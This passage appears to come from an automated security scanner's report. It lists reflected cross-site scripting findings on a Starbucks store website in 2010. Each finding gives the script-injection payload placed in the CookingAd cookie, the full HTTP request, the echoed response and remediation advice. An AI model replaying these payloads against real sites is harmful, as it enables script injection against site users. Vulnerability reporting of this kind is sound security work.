Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.49. http://www.starbucksstore.com/entertainment [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.50. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.51. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/extras/newsletters.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/extras/newsletters.asp"
   var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/extras/newsletters.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s
...[SNIP]...

3.52. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ist/ga_faq_shipop.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/ga_faq_shipop.asp"
   var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/ga_faq_shipop.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.53. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
guestassist/gareturns.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/gareturns.asp"
   var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/gareturns.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.54. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var
...[SNIP]...

3.55. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/links.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/links.asp"
   var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/links.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.56. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/track.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/track.asp"
   var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/track.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.57. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/include/SearchNav.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.58. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shabotus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shabotus.asp"
   var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shabotus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.59. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close

